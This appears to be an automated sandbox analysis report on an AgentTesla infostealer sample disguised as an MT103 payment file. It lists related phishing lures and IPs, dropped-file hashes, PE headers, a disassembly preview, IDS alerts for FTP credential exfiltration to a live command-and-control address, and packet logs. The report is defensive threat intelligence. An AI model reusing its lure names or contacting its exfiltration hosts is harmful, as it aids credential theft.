                                                  Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • 172.67.74.152
                                                  https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                  • 104.26.13.205
                                                  phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.12.205
                                                  https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                                                  • 104.26.12.205
                                                  ftp.haliza.com.myz1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  z38PO_20248099-1_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousNetSupport RATBrowse
                                                  • 104.26.1.231
                                                  Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.emlGet hashmaliciousUnknownBrowse
                                                  • 104.18.36.155
                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                  • 188.114.96.3
                                                  https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 104.20.6.133
                                                  INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                  • 188.114.96.3
                                                  SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdfGet hashmaliciousPhisherBrowse
                                                  • 188.114.96.3
                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 188.114.97.3
                                                  https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                  • 104.16.79.73
                                                  RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 188.114.97.3
                                                  RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 188.114.97.3
                                                  EXABYTES-AS-APExaBytesNetworkSdnBhdMYz1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  • 110.4.45.197
                                                  z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  na.elfGet hashmaliciousMiraiBrowse
                                                  • 203.142.6.25
                                                  05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 103.6.198.178
                                                  file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                  • 103.6.198.219
                                                  DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 110.4.45.197
                                                  file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                  • 103.6.198.219

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0ehttps://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                  • 104.26.12.205
                                                  Metro Plastics Technologies.pdfGet hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  RFQ Proposals ADC-24-65.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 104.26.12.205
                                                  RFQ Q700mm CB St44 PN20 e=5.6 mm TSEN 10217-1 #U7edd#U7f18#U94a2#U7ba1#Uff1a200 #U7c73.exeGet hashmaliciousMassLogger RATBrowse
                                                  • 104.26.12.205
                                                  Payment Receipt.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • 104.26.12.205
                                                  Invoice Ref ++_Donuts.htmlGet hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  Uschamber-TimeSheet Reports.pdfGet hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  https://saniest.com/PO/PO%20-%20OCT.'24673937.rarGet hashmaliciousUnknownBrowse
                                                  • 104.26.12.205
                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                  • 104.26.12.205

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rMT103_126021720924.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sgxIb.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):818176
                                                  Entropy (8bit):7.709635714155993
                                                  Encrypted:false
                                                  SSDEEP:12288:Xn9InteJjOMwfut0+ehcQ7vGruUWvRlthXBTHXLQU8Mr8zLXXIO2/Q4AyrrRPd4:XlI0TIcQ7Gr6DT3LQZsoIO2o4JPd
                                                  MD5:06EF3895BF1C5878463C502A7F1554EB
                                                  SHA1:9BB43516CA18892A0AACD7E1B0AEC0666FE2C735
                                                  SHA-256:C68AC751C2B84E31BD64A9D318FD5CDE9C1FA7F9F9090940808FEF7989B3ADE9
                                                  SHA-512:CF3226F8069068E7100738DEB5263793D510B50BD20CE82DF43825A983D360530C0100E45A718C3B9FAB091454C2C8FB7F6F817DDFDE31E8FC63CE54A985BA9E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0..R...(.......p... ........@.. ....................................@..................................o..O........%........................................................................... ............... ..H............text...PP... ...R.................. ..`.rsrc....%.......&...T..............@..@.reloc...............z..............@..B.................o......H.......@....o...........(...G..........................................R.(.......(....}....*....0..8........s......r...p...o.....s......s.......r...po....&...+...*.0..a..........s........r...p(........(.......r...p(........(.......r$..p(........(....s......r2..p...o.....*....0.............s........r...p(........(.......r...p(........(.......r$..p(........(.......r...p(..........O...(....s......r...p...o......{....o.....*....0..F..........s........r...p(.........O...(....s...

                                                  C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe:Zone.Identifier

                                                  Download File
                                                  Process:C:\Users\user\Desktop\rMT103_126021720924.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.709635714155993
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:rMT103_126021720924.exe
                                                  File size:818'176 bytes
                                                  MD5:06ef3895bf1c5878463c502a7f1554eb
                                                  SHA1:9bb43516ca18892a0aacd7e1b0aec0666fe2c735
                                                  SHA256:c68ac751c2b84e31bd64a9d318fd5cde9c1fa7f9f9090940808fef7989b3ade9
                                                  SHA512:cf3226f8069068e7100738deb5263793d510b50bd20ce82df43825a983d360530c0100e45a718c3b9fab091454c2c8fb7f6f817ddfde31e8fc63ce54a985ba9e
                                                  SSDEEP:12288:Xn9InteJjOMwfut0+ehcQ7vGruUWvRlthXBTHXLQU8Mr8zLXXIO2/Q4AyrrRPd4:XlI0TIcQ7Gr6DT3LQZsoIO2o4JPd
                                                  TLSH:CF05BDD03A76671ADE6A4AB5D168DDB547F62928B001FAE61DCD3BCB349C3109E18F03
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0..R...(.......p... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:cd7050787870e4d2

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4c7012
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67238F08 [Thu Oct 31 14:07:04 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  push ebx
                                                  add byte ptr [ecx+00h], bh
                                                  jnc 00007F531C6BFC62h
                                                  je 00007F531C6BFC62h
                                                  add byte ptr [ebp+00h], ch
                                                  add byte ptr [ecx+00h], al
                                                  arpl word ptr [eax], ax
                                                  je 00007F531C6BFC62h
                                                  imul eax, dword ptr [eax], 00610076h
                                                  je 00007F531C6BFC62h
                                                  outsd
                                                  add byte ptr [edx+00h], dh
                                                  inc edx
                                                  add byte ptr [ecx+00h], ah
                                                  jc 00007F531C6BFC62h
                                                  bound eax, dword ptr [eax]
                                                  add byte ptr [edx+00h], dh
                                                  jnc 00007F531C6BFC62h
                                                  push 70006F00h
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc6fc00x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x25a4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xc50500xc520040dab49800c8d490fc54e3e62a3dafa1False0.8492613546290425data7.713016398013977IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xc80000x25a40x2600dc140597501a7d1afd2d1c89db9c666eFalse0.8832236842105263data7.563697310200336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xcc0000xc0x2004770d7c7624d34fc3c378358d722bebeFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xc80c80x2185PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9455774385269782
                                                  RT_GROUP_ICON0xca2600x14data1.05
                                                  RT_VERSION0xca2840x31cdata0.44597989949748745

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-31T17:03:17.555574+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449742TCP
                                                  2024-10-31T17:03:18.695850+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449741110.4.45.19721TCP
                                                  2024-10-31T17:03:19.796759+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19759700TCP
                                                  2024-10-31T17:03:20.095892+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449746110.4.45.19759700TCP
                                                  2024-10-31T17:03:26.610863+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.449751110.4.45.19721TCP
                                                  2024-10-31T17:03:27.637706+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449752110.4.45.19760611TCP
                                                  2024-10-31T17:03:27.651556+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.449752110.4.45.19760611TCP
                                                  2024-10-31T17:03:44.496265+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.463429TCP
                                                  2024-10-31T17:03:45.837991+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.463430TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 31, 2024 17:03:01.563787937 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:01.563829899 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:01.563932896 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:01.570525885 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:01.570540905 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.181651115 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.181735039 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:02.185736895 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:02.185755014 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.185969114 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.241041899 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:02.241430044 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:02.287334919 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.478743076 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.478806019 CET44349732104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:02.479173899 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:02.484972000 CET49732443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:03.289181948 CET4973421192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:03.294203997 CET2149734110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:03.294281006 CET4973421192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:03.298964024 CET4973421192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:03.304038048 CET2149734110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:03.304086924 CET4973421192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:03.363944054 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:03.369522095 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:03.369580984 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:04.288233042 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:04.288408041 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:04.293308973 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:04.631843090 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:04.631961107 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:04.638286114 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.012732029 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.012851000 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:05.019371986 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.357796907 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.358058929 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:05.362967968 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.703283072 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:05.703422070 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:05.708416939 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:06.081101894 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:06.131696939 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:06.141598940 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:06.148088932 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:06.486332893 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:06.486830950 CET4973852695192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:06.493325949 CET5269549738110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:06.493402958 CET4973852695192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:06.493453026 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:06.499572992 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.451021910 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.454772949 CET4973852695192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:07.454772949 CET4973852695192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:07.459901094 CET5269549738110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.459918022 CET5269549738110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.459929943 CET5269549738110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.460756063 CET5269549738110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.460810900 CET4973852695192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:07.506763935 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:07.795377016 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:07.795977116 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:07.801170111 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:08.142056942 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:08.142481089 CET4973949882192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:08.147547960 CET4988249739110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:08.147615910 CET4973949882192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:08.147679090 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:08.152719021 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.053281069 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.053463936 CET4973949882192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:09.058801889 CET4988249739110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.059101105 CET4988249739110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.059151888 CET4973949882192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:09.100425959 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:09.630758047 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.630774021 CET2149735110.4.45.197192.168.2.4
                                                  Oct 31, 2024 17:03:09.630841970 CET4973521192.168.2.4110.4.45.197
                                                  Oct 31, 2024 17:03:13.541992903 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:13.542074919 CET44349740104.26.12.205192.168.2.4
                                                  Oct 31, 2024 17:03:13.542146921 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:13.545012951 CET49740443192.168.2.4104.26.12.205
                                                  Oct 31, 2024 17:03:13.545032024 CET44349740104.26.12.205192.168.2.4
